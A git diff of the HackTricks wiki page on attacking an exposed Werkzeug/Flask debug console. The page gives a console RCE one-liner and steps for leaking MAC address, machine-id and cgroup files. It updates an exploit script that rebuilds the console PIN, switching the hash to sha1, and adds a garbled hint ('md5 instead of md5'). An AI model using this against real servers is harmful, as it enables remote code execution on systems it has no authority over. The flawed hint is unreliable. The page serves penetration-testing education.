diff --git a/SUMMARY.md b/SUMMARY.md
index f2a2e2970..710c71b74 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -366,7 +366,7 @@
* [WAF Bypass](network-services-pentesting/pentesting-web/waf-bypass.md)
* [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
* [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
- * [werkzeug](network-services-pentesting/pentesting-web/werkzeug.md)
+ * [Werkzeug / Flask Debug](network-services-pentesting/pentesting-web/werkzeug.md)
* [Wordpress](network-services-pentesting/pentesting-web/wordpress.md)
* [XSS to RCE Electron Desktop Apps](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md)
* [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md
index 7347db927..f02531d97 100644
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@@ -1,23 +1,18 @@
-
+# Werkzeug / Flask Debug
-HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
+HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-
-# Console RCE
+## Console RCE
If debug is active you could try to access to `/console` and gain RCE.
@@ -29,14 +24,14 @@ __import__('os').popen('whoami').read();
There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
-# Pin Protected
+## Pin Protected
In some occasions the /console endpoint is going to be protected by a pin. Here you can find how to generate this pin:
* [https://www.daehee.com/werkzeug-console-pin-exploit/](https://www.daehee.com/werkzeug-console-pin-exploit/)
* [https://ctftime.org/writeup/17955](https://ctftime.org/writeup/17955)
-## Werkzeug Console PIN Exploit
+### Werkzeug Console PIN Exploit
**Copied from the first link.**\
See Werkzeug βconsole lockedβ message by forcing debug error page in the app.
@@ -49,7 +44,7 @@ shell that runs the server
Locate vulnerable Werkzeug debug console at path `vulnerable-site.com/console`, but is locked by secret PIN number.
-You can reverse the algorithm generating the console PIN. Inspect Werkzeugβs debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\__init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.
+You can reverse the algorithm generating the console PIN. Inspect Werkzeugβs debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.
In this file, see relevant method outlining steps to generate console PIN:
@@ -147,22 +142,74 @@ private_bits = [
]
```
-* `username` is the user who started this Flask
-* `modname` is flask.app
-* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is Flask
-* `getattr(mod, '__file__', None)` is the absolute path of `app.py` in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, try `app.pyc`
-* `uuid.getnode()` is the MAC address of the current computer, `str (uuid.getnode ())` is the decimal expression of the mac address
-* `get_machine_id()` read the value in `/etc/machine-id` or `/proc/sys/kernel/random/boot_id` and return directly if there is, sometimes it might be required to append a piece of information within `/proc/self/cgroup` that you find at the end of the first line (after the third slash)
+#### **`probably_public_bits`**
-To find server MAC address, need to know which network interface is being used to serve the app (e.g. `ens3`). If unknown, leak `/proc/net/arp` for device ID and then leak MAC address at `/sys/class/net//address`.
+* **`username`** is the user who started this Flask
+* **`modname`** is flask.app
+* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is **Flask**
+* `getattr(mod, '__file__', None)` is the **absolute path of `app.py`** in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, **try `app.pyc`**
-Convert from hex address to decimal representation by running in python e.g.:
+#### `private_bits`
+
+* `uuid.getnode()` is the **MAC address of the current computer**, `str(uuid.getnode())` is the decimal expression of the mac address.
+
+ * To **find server MAC address**, need to know which **network interface is being used** to serve the app (e.g. `ens3`). If unknown, **leak `/proc/net/arp`** for device ID and then **leak** MAC address at **`/sys/class/net//address`**.
+
+
+
+ Convert **from hex address to decimal** representation by running in python e.g.:
+
+ ```python
+ # It was 56:00:02:7a:23:ac
+ >>> print(0x5600027a23ac)
+ 94558041547692
+ ```
+* `get_machine_id()` concatenate the **values in `/etc/machine-id` ** , **`/proc/sys/kernel/random/boot_id`** and **first line of `/proc/self/cgroup`** after the last slash (`/`).
+
+
+
+get_machine_id() code
```python
->>> print(0x5600027a23ac)
-94558041547692
+def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
+ global _machine_id
+
+ if _machine_id is not None:
+ return _machine_id
+
+ def _generate() -> t.Optional[t.Union[str, bytes]]:
+ linux = b""
+
+ # machine-id is stable across boots, boot_id is not.
+ for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
+ try:
+ with open(filename, "rb") as f:
+ value = f.readline().strip()
+ except OSError:
+ continue
+
+ if value:
+ linux += value
+ break
+
+ # Containers share the same machine id, add some cgroup
+ # information. This is used outside containers too but should be
+ # relatively stable across boots.
+ try:
+ with open("/proc/self/cgroup", "rb") as f:
+ linux += f.readline().strip().rpartition(b"/")[2]
+ except OSError:
+ pass
+
+ if linux:
+ return linux
+
+ # On OS X, use ioreg to get the computer's serial number.
+ try:
```
+
+
Once all variables prepared, run exploit script to generate Werkzeug console PIN:
```python
@@ -180,7 +227,8 @@ private_bits = [
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]
-h = hashlib.md5()
+#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
+h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
@@ -210,22 +258,18 @@ if rv is None:
print(rv)
```
-If you are on a new version of Werkzeug, try changing the hashing algorithm to sha1 instead of md5.
+{% hint style="success" %}
+If you are on an **old version** of Werkzeug, try changing the **hashing algorithm to md5** instead of md5.
+{% endhint %}
-HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
+HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-
-